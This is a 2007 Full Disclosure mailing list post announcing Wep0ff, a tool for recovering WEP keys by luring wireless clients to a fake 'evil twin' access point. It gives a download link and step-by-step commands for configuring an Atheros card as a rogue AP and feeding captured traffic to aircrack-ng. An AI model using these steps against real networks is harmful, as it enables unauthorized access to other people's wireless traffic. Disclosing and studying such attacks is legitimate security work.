Full Disclosure mailing list archives
New tool for "evil twins" wireless attacks
From: "noreply" <noreply () ptsecurity ru>
Date: Wed, 17 Jan 2007 13:11:54 +0300
Wep0ff is new tool to crack WEP-key without access to AP by mount fake access point attack against WEP-based wireless clients. http://www.ptsecurity.ru/download/wepoff.tar.gz It uses combination of fragmentation and evil twin attacks to generate traffic which can be used for KoreK-style WEP-key recovery.
From readme:
This tool can be used to mount fake access point attack against WEP-based wireless clients. Using Atheros wireless cards in Linux. For details check http://www.securitylab.ru/analytics/287596.php (Russian) Written by Sergey Gordeychik <gordey (at) ptsecurity (dot) com> Released under a BSD Licence This code tested patched madwifi-old drivers with athraw support, but also works with madwifi-ng. With madwifi-ng you need to create two virtual interfaces: one in master mode (for fake AP) and second in monitor mode (to listen on). How to Use: 1. Setup fake AP with KARMA tools or iwconfig iwpriv ath0 mode 2 iwconfig ath0 mode master essid foo enc 1122334455 channel 7 echo 1 > /proc/sys/dev/ath0/rawdev echo 1 > /proc/sys/dev/ath0/rawdev_type ifconfig ath0 up ifconfig ath0raw up 2. Start this program (./wep0ff ath0raw 00:01:02:03:04:05) 3. Wait until client connect to fake access point 4. Launch airodump-ng to collect packets 5. Launch aircrack-ng to recover WEP key _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- New tool for "evil twins" wireless attacks noreply (Jan 17)